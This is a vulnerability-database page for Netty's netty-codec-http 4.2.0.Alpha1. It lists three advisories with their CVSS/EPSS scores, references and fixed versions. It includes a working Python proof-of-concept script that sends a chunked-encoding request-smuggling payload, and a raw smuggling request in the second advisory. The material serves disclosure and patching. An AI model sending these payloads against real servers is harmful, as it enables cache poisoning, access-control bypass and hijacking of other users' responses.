Lookup for vulnerable packages by Package URL.

Purlpkg:maven/io.netty/netty-codec-http@4.2.0.Alpha1
Typemaven
Namespaceio.netty
Namenetty-codec-http
Version4.2.0.Alpha1
Qualifiers
Subpath
Is_vulnerabletrue
Next_non_vulnerable_version4.2.5.Final
Latest_non_vulnerable_version4.2.10.Final
Affected_by_vulnerabilities
0
url VCID-9syp-fkzy-4fhy
vulnerability_id VCID-9syp-fkzy-4fhy
summary
Netty: HTTP Request Smuggling via Chunked Extension Quoted-String Parsing
## Summary

Netty incorrectly parses quoted strings in HTTP/1.1 chunked transfer encoding extension values, enabling request smuggling attacks.

## Background

This vulnerability is a new variant discovered during research into the "Funky Chunks" HTTP request smuggling techniques:

- <https://w4ke.info/2025/06/18/funky-chunks.html>
- <https://w4ke.info/2025/10/29/funky-chunks-2.html>

The original research tested various chunk extension parsing differentials but did not cover quoted-string handling within extension values.

## Technical Details

**RFC 9110 Section 7.1.1** defines chunked transfer encoding:

```
chunk = chunk-size [ chunk-ext ] CRLF chunk-data CRLF
chunk-ext = *( BWS ";" BWS chunk-ext-name [ BWS "=" BWS chunk-ext-val ] )
chunk-ext-val = token / quoted-string
```

**RFC 9110 Section 5.6.4** defines quoted-string:

```
quoted-string = DQUOTE *( qdtext / quoted-pair ) DQUOTE
```

Critically, the allowed character ranges within a quoted-string are:

```
qdtext = HTAB / SP / %x21 / %x23-5B / %x5D-7E / obs-text
quoted-pair = "\" ( HTAB / SP / VCHAR / obs-text )
```

CR (`%x0D`) and LF (`%x0A`) bytes fall outside all of these ranges and are therefore **not permitted** inside chunk extensions—whether quoted or unquoted. A strictly compliant parser should reject any request containing CR or LF bytes before the actual line terminator within a chunk extension with a `400 Bad Request` response (as Squid does, for example).

## Vulnerability

Netty terminates chunk header parsing at `\r\n` inside quoted strings instead of rejecting the request as malformed. This creates a parsing differential between Netty and RFC-compliant parsers, which can be exploited for request smuggling.

**Expected behavior (RFC-compliant):**
A request containing CR/LF bytes within a chunk extension value should be rejected outright as invalid.

**Actual behavior (Netty):**

```
Chunk: 1;a="value
            ^^^^^ parsing terminates here at \r\n (INCORRECT)
Body: here"... is treated as body or the beginning of a subsequent request
```

The root cause is that Netty does not validate that CR/LF bytes are forbidden inside chunk extensions before the terminating CRLF. Rather than attempting to parse through quoted strings, the appropriate fix is to reject such requests entirely.

## Proof of Concept

```python
#!/usr/bin/env python3
import socket

payload = (
    b"POST / HTTP/1.1\r\n"
    b"Host: localhost\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b'1;a="\r\n'
    b"X\r\n"
    b"0\r\n"
    b"\r\n"
    b"GET /smuggled HTTP/1.1\r\n"
    b"Host: localhost\r\n"
    b"Content-Length: 11\r\n"
    b"\r\n"
    b'"\r\n'
    b"Y\r\n"
    b"0\r\n"
    b"\r\n"
)

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
sock.connect(("127.0.0.1", 8080))
sock.sendall(payload)

response = b""
while True:
    try:
        chunk = sock.recv(4096)
        if not chunk:
            break
        response += chunk
    except socket.timeout:
        break

sock.close()
print(f"Responses: {response.count(b'HTTP/')}")
print(response.decode(errors="replace"))
```

**Result:** The server returns two HTTP responses from a single TCP connection, confirming request smuggling.

### Parsing Breakdown

| Parser                | Request 1         | Request 2                          |
|-----------------------|-------------------|------------------------------------|
| Netty (vulnerable)    | POST / body="X"  | GET /smuggled (SMUGGLED)           |
| RFC-compliant parser  | 400 Bad Request   | (none — malformed request rejected)|

## Impact

- **Request Smuggling**: An attacker can inject arbitrary HTTP requests into a connection.
- **Cache Poisoning**: Smuggled responses may poison shared caches.
- **Access Control Bypass**: Smuggled requests can circumvent frontend security controls.
- **Session Hijacking**: Smuggled requests may intercept responses intended for other users.

## Reproduction

1. Start the minimal proof-of-concept environment using the provided Docker configuration.
2. Execute the proof-of-concept script included in the attached archive.

## Suggested Fix

The parser should reject requests containing CR or LF bytes within chunk extensions rather than attempting to interpret them:

```
1. Read chunk-size.
2. If ';' is encountered, begin parsing extensions:
   a. For each byte before the terminating CRLF:
      - If CR (%x0D) or LF (%x0A) is encountered outside the
        final terminating CRLF, reject the request with 400 Bad Request.
   b. If the extension value begins with DQUOTE, validate that all
      enclosed bytes conform to the qdtext / quoted-pair grammar.
3. Only treat CRLF as the chunk header terminator when it appears
   outside any quoted-string context and contains no preceding
   illegal bytes.
```

## Acknowledgments

Credit to Ben Kallus for clarifying the RFC interpretation during discussion on the HAProxy mailing list.

## Resources

- [RFC 9110: HTTP Semantics (Sections 5.6.4, 7.1.1)](https://www.rfc-editor.org/rfc/rfc9110)
- [Funky Chunks Research](https://w4ke.info/2025/06/18/funky-chunks.html)
- [Funky Chunks 2 Research](https://w4ke.info/2025/10/29/funky-chunks-2.html)

## Attachments

![Vulnerability Diagram](https://github.com/user-attachments/assets/2faaa23e-693b-4efc-afb7-aae1d4101e7e)

[java_netty.zip](https://github.com/user-attachments/files/24697955/java_netty.zip)
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33870.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33870.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-33870
reference_id
reference_type
scores
0
value 0.00014
scoring_system epss
scoring_elements 0.02515
published_at 2026-04-21T12:55:00Z
1
value 0.0004
scoring_system epss
scoring_elements 0.12078
published_at 2026-04-16T12:55:00Z
2
value 0.0004
scoring_system epss
scoring_elements 0.12191
published_at 2026-04-13T12:55:00Z
3
value 0.0004
scoring_system epss
scoring_elements 0.12227
published_at 2026-04-12T12:55:00Z
4
value 0.0004
scoring_system epss
scoring_elements 0.12258
published_at 2026-04-09T12:55:00Z
5
value 0.0004
scoring_system epss
scoring_elements 0.12209
published_at 2026-04-08T12:55:00Z
6
value 0.0004
scoring_system epss
scoring_elements 0.12128
published_at 2026-04-07T12:55:00Z
7
value 0.0004
scoring_system epss
scoring_elements 0.12329
published_at 2026-04-04T12:55:00Z
8
value 0.0004
scoring_system epss
scoring_elements 0.12282
published_at 2026-04-02T12:55:00Z
9
value 0.0004
scoring_system epss
scoring_elements 0.12265
published_at 2026-04-11T12:55:00Z
10
value 0.0004
scoring_system epss
scoring_elements 0.1208
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-33870
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33870
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33870
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/netty/netty
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/netty/netty
5
reference_url https://github.com/netty/netty/security/advisories/GHSA-pwqr-wmgm-9rr8
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T13:55:28Z/
url https://github.com/netty/netty/security/advisories/GHSA-pwqr-wmgm-9rr8
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-33870
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-33870
7
reference_url https://w4ke.info/2025/06/18/funky-chunks.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T13:55:28Z/
url https://w4ke.info/2025/06/18/funky-chunks.html
8
reference_url https://w4ke.info/2025/10/29/funky-chunks-2.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T13:55:28Z/
url https://w4ke.info/2025/10/29/funky-chunks-2.html
9
reference_url https://www.rfc-editor.org/rfc/rfc9110
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T13:55:28Z/
url https://www.rfc-editor.org/rfc/rfc9110
10
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1132229
reference_id 1132229
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1132229
11
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2452453
reference_id 2452453
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2452453
12
reference_url https://github.com/advisories/GHSA-pwqr-wmgm-9rr8
reference_id GHSA-pwqr-wmgm-9rr8
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-pwqr-wmgm-9rr8
13
reference_url https://access.redhat.com/errata/RHSA-2026:7109
reference_id RHSA-2026:7109
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:7109
14
reference_url https://access.redhat.com/errata/RHSA-2026:7380
reference_id RHSA-2026:7380
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:7380
15
reference_url https://access.redhat.com/errata/RHSA-2026:8159
reference_id RHSA-2026:8159
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8159
16
reference_url https://access.redhat.com/errata/RHSA-2026:8509
reference_id RHSA-2026:8509
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8509
fixed_packages
0
url pkg:maven/io.netty/netty-codec-http@4.2.10.Final
purl pkg:maven/io.netty/netty-codec-http@4.2.10.Final
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.2.10.Final
aliases CVE-2026-33870, GHSA-pwqr-wmgm-9rr8
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-9syp-fkzy-4fhy
1
url VCID-n9u5-a8js-hbf2
vulnerability_id VCID-n9u5-a8js-hbf2
summary
Netty vulnerable to request smuggling due to incorrect parsing of chunk extensions
## Summary
A flaw in netty's parsing of chunk extensions in HTTP/1.1 messages with chunked encoding can lead to request smuggling issues with some reverse proxies.

## Details
When encountering a newline character (LF) while parsing a chunk extension, netty interprets the newline as the end of the chunk-size line regardless of whether a preceding carriage return (CR) was found. This is in violation of the HTTP 1.1 standard which specifies that the chunk extension is terminated by a CRLF sequence (see the [RFC](https://datatracker.ietf.org/doc/html/rfc9112#name-chunked-transfer-coding)).

This is by itself harmless, but consider an intermediary with a similar parsing flaw: while parsing a chunk extension, the intermediary interprets an LF without a preceding CR as simply part of the chunk extension (this is also in violation of the RFC, because whitespace characters are not allowed in chunk extensions). We can use this discrepancy to construct an HTTP request that the intermediary will interpret as one request but netty will interpret as two (all lines ending with CRLF, notice the LFs in the chunk extension):

```
POST /one HTTP/1.1
Host: localhost:8080
Transfer-Encoding: chunked

48;\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n0

POST /two HTTP/1.1
Host: localhost:8080
Transfer-Encoding: chunked

0

```

The intermediary will interpret this as a single request. Once forwarded to netty, netty will interpret it as two separate requests. This is a problem, because attackers can then the intermediary, as well as perform standard request smuggling attacks against other live users (see [this Portswigger article](https://portswigger.net/web-security/request-smuggling/exploiting)).

## Impact
This is a request smuggling issue which can be exploited for bypassing front-end access control rules as well as corrupting the responses served to other live clients.

The impact is high, but it only affects setups that use a front-end which:
1. Interprets LF characters (without preceding CR) in chunk extensions as part of the chunk extension.
2. Forwards chunk extensions without normalization.

## Disclosure

 - This vulnerability was disclosed on June 18th, 2025 here: https://w4ke.info/2025/06/18/funky-chunks.html

## Discussion
Discussion for this vulnerability can be found here:
 - https://github.com/netty/netty/issues/15522
 - https://github.com/JLLeitschuh/unCVEed/issues/1

## Credit

 - Credit to @JeppW for uncovering this vulnerability.
 - Credit to @JLLeitschuh at [Socket](https://socket.dev/) for coordinating the vulnerability disclosure.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-58056.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-58056.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-58056
reference_id
reference_type
scores
0
value 0.00032
scoring_system epss
scoring_elements 0.09335
published_at 2026-04-04T12:55:00Z
1
value 0.00032
scoring_system epss
scoring_elements 0.09283
published_at 2026-04-02T12:55:00Z
2
value 0.00038
scoring_system epss
scoring_elements 0.11199
published_at 2026-04-16T12:55:00Z
3
value 0.00038
scoring_system epss
scoring_elements 0.11368
published_at 2026-04-12T12:55:00Z
4
value 0.00038
scoring_system epss
scoring_elements 0.11339
published_at 2026-04-13T12:55:00Z
5
value 0.00038
scoring_system epss
scoring_elements 0.11201
published_at 2026-04-18T12:55:00Z
6
value 0.00038
scoring_system epss
scoring_elements 0.11401
published_at 2026-04-11T12:55:00Z
7
value 0.00038
scoring_system epss
scoring_elements 0.11331
published_at 2026-04-21T12:55:00Z
8
value 0.00038
scoring_system epss
scoring_elements 0.11394
published_at 2026-04-09T12:55:00Z
9
value 0.0004
scoring_system epss
scoring_elements 0.12032
published_at 2026-04-08T12:55:00Z
10
value 0.0004
scoring_system epss
scoring_elements 0.1195
published_at 2026-04-07T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-58056
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-58056
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-58056
3
reference_url https://datatracker.ietf.org/doc/html/rfc9112#name-chunked-transfer-coding
reference_id
reference_type
scores
0
value 2.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
1
value LOW
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-09-04T19:09:52Z/
url https://datatracker.ietf.org/doc/html/rfc9112#name-chunked-transfer-coding
4
reference_url https://github.com/github/advisory-database/pull/6092
reference_id
reference_type
scores
0
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/github/advisory-database/pull/6092
5
reference_url https://github.com/JLLeitschuh/unCVEed/issues/1
reference_id
reference_type
scores
0
value 2.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
1
value LOW
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-09-04T19:09:52Z/
url https://github.com/JLLeitschuh/unCVEed/issues/1
6
reference_url https://github.com/netty/netty
reference_id
reference_type
scores
0
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/netty/netty
7
reference_url https://github.com/netty/netty/commit/edb55fd8e0a3bcbd85881e423464f585183d1284
reference_id
reference_type
scores
0
value 2.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
1
value LOW
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-09-04T19:09:52Z/
url https://github.com/netty/netty/commit/edb55fd8e0a3bcbd85881e423464f585183d1284
8
reference_url https://github.com/netty/netty/issues/15522
reference_id
reference_type
scores
0
value 2.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
1
value LOW
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-09-04T19:09:52Z/
url https://github.com/netty/netty/issues/15522
9
reference_url https://github.com/netty/netty/pull/15611
reference_id
reference_type
scores
0
value 2.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
1
value LOW
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-09-04T19:09:52Z/
url https://github.com/netty/netty/pull/15611
10
reference_url https://github.com/netty/netty/security/advisories/GHSA-fghv-69vj-qj49
reference_id
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
1
value 2.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
2
value LOW
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-09-04T19:09:52Z/
url https://github.com/netty/netty/security/advisories/GHSA-fghv-69vj-qj49
11
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-58056
reference_id
reference_type
scores
0
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-58056
12
reference_url https://w4ke.info/2025/06/18/funky-chunks.html
reference_id
reference_type
scores
0
value 2.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
1
value LOW
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-09-04T19:09:52Z/
url https://w4ke.info/2025/06/18/funky-chunks.html
13
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1113995
reference_id 1113995
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1113995
14
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2392996
reference_id 2392996
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2392996
15
reference_url https://github.com/advisories/GHSA-fghv-69vj-qj49
reference_id GHSA-fghv-69vj-qj49
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-fghv-69vj-qj49
16
reference_url https://access.redhat.com/errata/RHSA-2025:17187
reference_id RHSA-2025:17187
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:17187
17
reference_url https://access.redhat.com/errata/RHSA-2025:17298
reference_id RHSA-2025:17298
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:17298
18
reference_url https://access.redhat.com/errata/RHSA-2025:17299
reference_id RHSA-2025:17299
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:17299
19
reference_url https://access.redhat.com/errata/RHSA-2025:17317
reference_id RHSA-2025:17317
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:17317
20
reference_url https://access.redhat.com/errata/RHSA-2025:17318
reference_id RHSA-2025:17318
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:17318
21
reference_url https://access.redhat.com/errata/RHSA-2025:17563
reference_id RHSA-2025:17563
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:17563
22
reference_url https://access.redhat.com/errata/RHSA-2025:17567
reference_id RHSA-2025:17567
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:17567
23
reference_url https://access.redhat.com/errata/RHSA-2025:18028
reference_id RHSA-2025:18028
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:18028
24
reference_url https://access.redhat.com/errata/RHSA-2025:18076
reference_id RHSA-2025:18076
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:18076
25
reference_url https://access.redhat.com/errata/RHSA-2025:21148
reference_id RHSA-2025:21148
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:21148
26
reference_url https://access.redhat.com/errata/RHSA-2026:3102
reference_id RHSA-2026:3102
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3102
27
reference_url https://usn.ubuntu.com/7918-1/
reference_id USN-7918-1
reference_type
scores
url https://usn.ubuntu.com/7918-1/
fixed_packages
0
url pkg:maven/io.netty/netty-codec-http@4.2.5.Final
purl pkg:maven/io.netty/netty-codec-http@4.2.5.Final
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.2.5.Final
aliases CVE-2025-58056, GHSA-fghv-69vj-qj49
risk_score 3.4
exploitability 0.5
weighted_severity 6.8
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-n9u5-a8js-hbf2
2
url VCID-qyhp-twx4-vffc
vulnerability_id VCID-qyhp-twx4-vffc
summary
Netty has a CRLF Injection vulnerability in io.netty.handler.codec.http.HttpRequestEncoder
The `io.netty.handler.codec.http.HttpRequestEncoder` CRLF injection with the request uri when constructing a request. This leads to request smuggling when `HttpRequestEncoder` is used without proper sanitization of the uri.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-67735.json
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-67735.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-67735
reference_id
reference_type
scores
0
value 0.00028
scoring_system epss
scoring_elements 0.07816
published_at 2026-04-13T12:55:00Z
1
value 0.00028
scoring_system epss
scoring_elements 0.07774
published_at 2026-04-07T12:55:00Z
2
value 0.00028
scoring_system epss
scoring_elements 0.07769
published_at 2026-04-02T12:55:00Z
3
value 0.00028
scoring_system epss
scoring_elements 0.07731
published_at 2026-04-16T12:55:00Z
4
value 0.00028
scoring_system epss
scoring_elements 0.0783
published_at 2026-04-12T12:55:00Z
5
value 0.00028
scoring_system epss
scoring_elements 0.07844
published_at 2026-04-11T12:55:00Z
6
value 0.00028
scoring_system epss
scoring_elements 0.07853
published_at 2026-04-09T12:55:00Z
7
value 0.00028
scoring_system epss
scoring_elements 0.07832
published_at 2026-04-08T12:55:00Z
8
value 0.0003
scoring_system epss
scoring_elements 0.08556
published_at 2026-04-18T12:55:00Z
9
value 0.0003
scoring_system epss
scoring_elements 0.08712
published_at 2026-04-21T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-67735
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-67735
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-67735
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/netty/netty
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/netty/netty
5
reference_url https://github.com/netty/netty/commit/77e81f1e5944d98b3acf887d3aa443b252752e94
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/netty/netty/commit/77e81f1e5944d98b3acf887d3aa443b252752e94
6
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1123606
reference_id 1123606
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1123606
7
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2422568
reference_id 2422568
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2422568
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-67735
reference_id CVE-2025-67735
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-67735
9
reference_url https://github.com/advisories/GHSA-84h7-rjj3-6jx4
reference_id GHSA-84h7-rjj3-6jx4
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-84h7-rjj3-6jx4
10
reference_url https://github.com/netty/netty/security/advisories/GHSA-84h7-rjj3-6jx4
reference_id GHSA-84h7-rjj3-6jx4
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-12-16T14:26:21Z/
url https://github.com/netty/netty/security/advisories/GHSA-84h7-rjj3-6jx4
11
reference_url https://access.redhat.com/errata/RHSA-2026:1899
reference_id RHSA-2026:1899
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:1899
fixed_packages
0
url pkg:maven/io.netty/netty-codec-http@4.2.8.Final
purl pkg:maven/io.netty/netty-codec-http@4.2.8.Final
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.2.8.Final
aliases CVE-2025-67735, GHSA-84h7-rjj3-6jx4
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-qyhp-twx4-vffc
Fixing_vulnerabilities
Risk_score4.0
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.2.0.Alpha1